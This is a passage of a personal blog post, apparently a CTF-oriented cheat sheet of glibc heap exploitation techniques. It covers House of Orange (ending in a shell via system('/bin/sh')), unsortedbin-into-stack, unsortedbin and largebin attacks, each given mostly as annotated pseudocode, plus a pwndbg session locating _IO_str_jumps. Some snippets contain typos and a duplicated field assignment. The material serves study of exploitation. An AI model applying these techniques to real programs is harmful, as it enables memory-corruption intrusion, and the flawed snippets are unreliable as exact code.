class="title">malloc_chunk</span> *<span class="title">top_chunk</span> = <span class="title">raw_to_chunk</span>(<span class="title">p1</span> + 0<span class="title">x400</span>);</span></span><br><span class="line"><span class="comment">// two conditions should be satisfy:</span></span><br><span class="line"><span class="comment">// 1. Top chunk + size has to be page aligned</span></span><br><span class="line"><span class="comment">// 2. Top chunk's prev_inuse bit has to be set</span></span><br><span class="line">top_chunk-&gt;size = <span class="number">0xc01</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// sz &gt; top_chunk-&gt;size (new)</span></span><br><span class="line"><span class="built_in">malloc</span>(sz); <span class="comment">// malloc(0x1000)</span></span><br><span class="line"></span><br><span class="line">assert(is_in_unsortedbin(top_chunk) == True)</span><br></pre></td></tr></table></figure></p>
<h2 id="House-of-Orange-Phase-2"><a href="#House-of-Orange-Phase-2" class="headerlink" title="House of Orange (Phase 2)"></a>House of Orange (Phase 2)</h2><p>The tactic can be used to bypass vtable check added in 2.24.<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: any non-fastbin size</span></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow</span></span><br><span class="line"><span class="comment">// [POST-CONDITION]</span></span><br><span class="line">    <span class="comment">// call system('/bin/sh')</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="comment">//avoid merge</span></span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// move p2 to the unsorted bin</span></span><br><span class="line"><span class="built_in">free</span>(p2);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">chunk2</span> = <span class="title">raw_to_chunk</span>(<span class="title">p2</span>);</span></span><br><span class="line">_IO_FILE *fp = (_IO_FILE*) fp;</span><br><span class="line"><span class="comment">// [BUG] Heap Overflow p1 to overwrite p2's metadata</span></span><br><span class="line">fp-&gt;flags = <span class="number">0</span>; <span class="comment">// chunk2-&gt;prev_size; chunk2+0x0</span></span><br><span class="line">fp-&gt;_IO_read_ptr = <span class="number">0x61</span>; <span class="comment">// chunk2-&gt;size; chunk2+0x8</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Following overwrite can be done by UAF</span></span><br><span class="line">fp-&gt;_IO_read_base = _IO_list_all<span class="number">-0x10</span>; <span class="comment">// chunk2+0x18; libc.symbols['_IO_list_list']</span></span><br><span class="line">fp-&gt;_IO_write_base = <span class="number">0</span>; <span class="comment">// chunk2+0x20</span></span><br><span class="line">fp-&gt;_IO_write_ptr = <span class="number">1</span>; <span class="comment">// chunk2+0x28</span></span><br><span class="line">fp-&gt;_IO_buf_base = &amp;bin_sh; <span class="comment">// chunk2+0x38; next(libc.search('/bin/sh'))</span></span><br><span class="line">fp-&gt;_mode = <span class="number">0</span>; <span class="comment">// chunk2+0xc0</span></span><br><span class="line">chunk2+<span class="number">0xd8</span> = _IO_str_jumps - <span class="number">8</span>; <span class="comment">// fp_plus-&gt;vtable</span></span><br><span class="line">chunk2+<span class="number">0xe8</span> = system <span class="comment">// chunk2+0xe8</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// trigger, error message printed but still can get shell.</span></span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// get shell!</span></span><br></pre></td></tr></table></figure></p>
<h3 id="Appendix-How-to-Find-IO-str-jumps"><a href="#Appendix-How-to-Find-IO-str-jumps" class="headerlink" title="Appendix: How to Find _IO_str_jumps"></a>Appendix: How to Find <code>_IO_str_jumps</code></h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p _IO_str_underflow</span><br><span class="line">$<span class="number">1</span> = &#123;&lt;text variable, no debug info&gt;&#125; <span class="number">0x7f4d4cf04790</span> &lt;_IO_str_underflow&gt;</span><br><span class="line">pwndbg&gt; search -p <span class="number">0x7f4d4cf04790</span></span><br><span class="line">libc.so<span class="number">.6</span>       <span class="number">0x7f4d4d2240a0</span> <span class="number">0x7f4d4cf04790</span></span><br><span class="line">libc.so<span class="number">.6</span>       <span class="number">0x7f4d4d224160</span> <span class="number">0x7f4d4cf04790</span></span><br><span class="line">libc.so<span class="number">.6</span>       [<span class="number">0x7f4d4d2245e0</span>] <span class="number">0x7f4d4cf04790</span></span><br><span class="line">pwndbg&gt; p &amp;_IO_file_jumps</span><br><span class="line">$<span class="number">2</span> = (&lt;data variable, no debug info&gt; *) <span class="number">0x7f4d4d224440</span> &lt;_IO_file_jumps&gt;</span><br></pre></td></tr></table></figure>
<p><code>_IO_str_jumps</code> &lt; <code>_IO_file_jumps</code>, so last entry of the search is what we want.<br><code>_IO_str_jumps</code> = 0x7f4d4d2245e0 - 0x20 = 0x7f4d4d2245c0</p>
<h2 id="Unsortedbin-Into-Stack"><a href="#Unsortedbin-Into-Stack" class="headerlink" title="Unsortedbin Into Stack"></a>Unsortedbin Into Stack</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: any non-fastbin size</span></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow</span></span><br><span class="line"><span class="comment">// [POST-CONDITION]</span></span><br><span class="line">    <span class="comment">// malloc(sz) == dst + offsetof(struct malloc_chunk, fd)</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="comment">//avoid merge</span></span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// move p2 to the unsorted bin</span></span><br><span class="line"><span class="built_in">free</span>(p2);</span><br><span class="line"></span><br><span class="line"><span class="comment">// create a fake chunk at dst</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake</span> = <span class="title">dst</span>;</span></span><br><span class="line"><span class="comment">// set fake-&gt;size to be the chunk size of the last allocation</span></span><br><span class="line">fake-&gt;size = malloc_size_to_chunk_size(sz);</span><br><span class="line"><span class="comment">// set fake-&gt;bk to any writable address to avoid crash</span></span><br><span class="line">fake-&gt;bk = fake;</span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow p1</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">c2</span> = <span class="title">raw_to_chunk</span>(<span class="title">p2</span>);</span></span><br><span class="line"><span class="comment">// size should be smaller than the next allocation size</span></span><br><span class="line"><span class="comment">// to avoid returning c2 in the next alloction</span></span><br><span class="line"><span class="comment">// size shouldn't be too small: </span></span><br><span class="line"><span class="comment">// bypass size&gt;2*SIZE_SZ (&gt;16 on x64) &amp;&amp; size &lt; av-&gt;system_mem.</span></span><br><span class="line">c2-&gt;size = <span class="number">2</span> * <span class="keyword">sizeof</span>(<span class="keyword">size_t</span>)</span><br><span class="line"><span class="comment">// set the next pointer in the unsorted bin</span></span><br><span class="line">c2-&gt;bk = fake;</span><br><span class="line"></span><br><span class="line"><span class="comment">// now unsorted bin: c2 -&gt; fake,</span></span><br><span class="line"><span class="comment">// and c2 is too small for the request.</span></span><br><span class="line"><span class="comment">// therefore, next allocation returns the fake chunk</span></span><br><span class="line">assert(<span class="built_in">malloc</span>(sz)) == fake + offsetof(struct malloc_chunk, fd));</span><br></pre></td></tr></table></figure>
<h2 id="Unsoredbin-Attack"><a href="#Unsoredbin-Attack" class="headerlink" title="Unsoredbin Attack"></a>Unsoredbin Attack</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: non-fastbin size</span></span><br><span class="line">    <span class="comment">// dst: where to overwrite</span></span><br><span class="line"><span class="comment">// [BUG] Use-After-Free</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] *dst -&gt; large value (e.g. 0x7ffff7dd1b78)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="comment">// avoid merge with top chunk</span></span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// p1 gets into unsortedbin.</span></span><br><span class="line"><span class="built_in">free</span>(p1);</span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">chunk1</span> = <span class="title">raw_to_chunk</span>(<span class="title">p1</span>);</span></span><br><span class="line"><span class="keyword">size_t</span> target_value = chunk1-&gt;fd; <span class="comment">// (e.g. 0x7ffff7dd1b78)</span></span><br><span class="line"><span class="comment">// [BUG] Use-After-Free: overwrite p1-&gt;bk while it's in unsortedbin.</span></span><br><span class="line"><span class="comment">// x64: dst-0x10, x32: dst-0x8; </span></span><br><span class="line"><span class="comment">// chunk1-&gt;bk: p1+0x10</span></span><br><span class="line">chunk1-&gt;bk = dst<span class="number">-0x10</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> *p3 = <span class="built_in">malloc</span>(sz);</span><br><span class="line">assert(*dst == target_value);</span><br></pre></td></tr></table></figure>
<h2 id="Largebin-Attack"><a href="#Largebin-Attack" class="headerlink" title="Largebin Attack"></a>Largebin Attack</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz1: largebin size, sz2: largebin size, sz1 &lt; sz2</span></span><br><span class="line">    <span class="comment">// dst1, dst2: where to overwrite</span></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] *dst1, *dst2 -&gt; heap_address (e.g. 0x4057a0)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz1);</span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x10</span>);  <span class="comment">// avoid merge</span></span><br><span class="line"><span class="comment">// sz1 &lt; sz2</span></span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(sz2);</span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x10</span>); <span class="comment">// avoid merge</span></span><br><span class="line"><span class="keyword">void</span> *p3 = <span class="built_in">malloc</span>(sz2);</span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x10</span>); <span class="comment">// avoid merge</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">free</span>(p1);</span><br><span class="line"><span class="built_in">free</span>(p2);</span><br><span class="line"><span class="comment">// put p1,p2 in unsortedbin: </span></span><br><span class="line"><span class="comment">// unsortedbin_list-&gt;p2-&gt;p1</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// malloc a size smaller than largebin size</span></span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x90</span>);</span><br><span class="line"><span class="comment">// allocate space from p1, now p2 is in larginbin and p1_remain in unsortedbin:</span></span><br><span class="line"><span class="comment">// largebin_list-&gt;p2; unsortedbin_list-&gt;p1_remain; </span></span><br><span class="line"></span><br><span class="line"><span class="built_in">free</span>(p3);</span><br><span class="line"><span class="comment">// put p3 in unsortedbin:</span></span><br><span class="line"><span class="comment">// unsortedbin_list-&gt;p3-&gt;p1_reamin;</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">chunk2</span> = <span class="title">raw_to_chunk</span>(<span class="title">p2</span>);</span></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow or Overlap Chunk</span></span><br><span class="line"><span class="comment">// change chunk2-&gt;size smaller than its origin value, even 0 is ok.</span></span><br><span class="line">chunk2-&gt;size = new_size; <span class="comment">// new_size &lt; chunk2-&gt;size, 0 is ok</span></span><br><span class="line">chunk2-&gt;fd = <span class="number">0</span>;</span><br><span class="line">chunk2-&gt;bk = <span class="number">0</span>;</span><br><span class="line">chunk2-&gt;fd_size = dst1 - <span class="number">0x10</span>;</span><br><span class="line">chunk2-&gt;fd_size = dst2 - <span class="number">0x20</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// malloc a size smaller than largebin size</span></span><br><span class="line"><span class="built_in">malloc</span>(<span class="number">0x90</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// dst1 &amp; dst2 has been overwritten with a heap address.</span></span><br><span class="line">assert(*dst1 == heap_address);</span><br><span class="line">assert(*dst2 == heap_address);</span><br></pre></td></tr></table></figure>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/04/C-UnitTest-and-Coverage/" rel="next" title="C++ Unit Test and Coverage">
                <i class="fa fa-chevron-left"></i> C++ Unit Test and Coverage
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/19/亲密关系破坏指南-《无敌破坏王2》/" rel="prev" title="亲密关系破坏指南--《无敌破坏王2》">
                亲密关系破坏指南--《无敌破坏王2》 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Matthew Shao">
          <p class="site-author-name" itemprop="name">Matthew Shao</p>
          <p class="site-description motion-element" itemprop="description">Pwning with Confidence!🤟</p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">49</span>
                <span class="site-state-item-name">文章</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分類</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">13</span>
                <span class="site-state-item-name">標籤</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/MatthewShao" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Unlink"><span class="nav-number">1.</span> <span class="nav-text">Unlink</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Fastbin-Attack"><span class="nav-number">2.</span> <span class="nav-text">Fastbin Attack</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Spirit"><span class="nav-number">3.</span> <span class="nav-text">House of Spirit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Lore"><span class="nav-number">4.</span> <span class="nav-text">House of Lore</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Force"><span class="nav-number">5.</span> <span class="nav-text">House of Force</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Einherjar"><span class="nav-number">6.</span> <span class="nav-text">House of Einherjar</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Orange-Phase-1"><span class="nav-number">7.</span> <span class="nav-text">House of Orange (Phase 1)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#House-of-Orange-Phase-2"><span class="nav-number">8.</span> <span class="nav-text">House of Orange (Phase 2)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Appendix-How-to-Find-IO-str-jumps"><span class="nav-number">8.1.</span> <span class="nav-text">Appendix: How to Find _IO_str_jumps</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Unsortedbin-Into-Stack"><span class="nav-number">9.</span> <span class="nav-text">Unsortedbin Into Stack</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Unsoredbin-Attack"><span class="nav-number">10.</span> <span class="nav-text">Unsoredbin Attack</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Largebin-Attack"><span class="nav-number">11.</span> <span class="nav-text">Largebin Attack</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Matthew Shao</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 強力驅動
</div>

<div class="theme-info">
  主題 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Logos
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/schemes/logos.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  

  




  
  

  

  

  

  


</body>
</html>
